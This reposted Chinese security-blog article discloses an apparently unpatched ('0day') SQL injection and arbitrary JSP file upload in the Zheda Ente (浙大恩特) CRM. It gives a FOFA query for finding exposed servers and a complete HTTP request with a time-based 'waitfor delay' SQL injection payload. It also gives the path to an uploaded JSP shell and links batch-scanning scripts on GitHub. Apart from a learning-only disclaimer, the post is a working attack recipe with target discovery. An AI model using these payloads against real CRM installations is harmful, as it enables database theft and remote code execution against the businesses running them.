浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞

admin 2023年11月19日20:18:09评论71 views字数 1137阅读3分47秒阅读模式

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞


一、漏洞描述

杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。

浙大恩特客户资源管理系统中的T0140_editAction.entweb接口存在SQL注入漏洞,攻击者可通过此漏洞获取企业数据库内数据,威胁其他数据安全。

MailAction 接口存在任意文件上传,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞


二、网络空间搜索引擎搜索


fofa查询:

title="欢迎使用浙大恩特客户资源管理系统"


浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞


三、漏洞复现


SQL注入漏洞POC

GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';waitfor+delay+'0:0:5'-- HTTP/1.1Host: ip:portAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Connection: closeCache-Control: max-age=0

浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞

MailAction 任意文件上传漏洞

浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞

然后访问路径:http://ip:port/enterdoc/EnterMail/20231118/2023111819455396702806276/check.jsp

浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞



四、漏洞检测


pocsuite漏洞检测

浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞

浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞

批量漏洞检测脚本已上传至github,希望大家下载时候点个star 支持一下

漏洞已上传免费漏洞库地址:

https://github.com/Vme18000yuan/FreePOC

浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞




免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞


原文始发于微信公众号(网络安全透视镜):浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月19日20:18:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   浙大恩特CRM最新0day 任意文件上传漏洞与SQL 注入漏洞https://cn-sec.com/archives/2219375.html

发表评论

匿名网友 填写信息